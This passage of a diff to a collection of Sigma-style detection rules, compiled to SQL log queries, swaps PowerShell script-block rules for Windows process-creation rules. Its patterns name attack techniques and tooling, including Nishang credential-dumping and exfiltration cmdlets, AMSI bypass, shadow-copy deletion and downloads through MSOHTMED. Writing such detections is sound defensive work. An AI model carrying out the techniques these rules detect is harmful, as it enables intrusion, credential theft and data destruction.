+ "Amazon SSM Document Worker", + "Windows Defender ATP" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT 
((ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_test_netconnection.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", + "status": "experimental", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Powershell Create Scheduled Task", - "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "status": "test", - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "author": "frack113", + "title": "Download Arbitrary Files Via MSOHTMED.EXE", + "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "status": "experimental", + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE 
'\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_cmdlet_scheduled_task.yml" + "filename": "proc_creation_win_lolbin_msohtmed_download.yml" }, { - "title": "Root Certificate Installed - PowerShell", - "id": "42821614-9264-4761-acfc-5772c3286f76", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "New User Created Via Net.EXE", + "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "status": "test", + "description": "Identifies the creation of local users via the net.exe command.", + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" ], - "filename": "posh_ps_root_certificate_installed.yml" + "filename": "proc_creation_win_net_user_add.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE 
'%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Clear PowerShell History - PowerShell", - "id": "26b692dc-1722-49b2-b496-a8258aa6371d", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1070.003" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE 
'%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_clear_powershell_history.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT 
* FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\' OR NewProcessName LIKE '%.scr' ESCAPE '\\')) AND NOT ((NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\'))) AND NOT ((NewProcessName IN ('-', '')) OR (NewProcessName = '') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 
'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Hyper-V Cmdlets", - "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "title": "New Kernel Driver Via SC.EXE", + "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", "status": "experimental", - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "author": "frack113", + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + 
"author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.006" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare legitimate installation of kernel drivers via sc.exe" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_hyper_v_condlet.yml" + "filename": "proc_creation_win_sc_new_kernel_driver.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsScript", - "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. 
Which is often used by attackers to perform AD enumeration.", - "author": "frack113, Nasreddine Bencherchali", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", - "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "status": "experimental", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.t1003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Diagnostics" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "Code Execution via Pcwutl.dll", + "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrative scripts that use the same keywords." 
+ "Use of Program Compatibility Troubleshooter Helper" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND 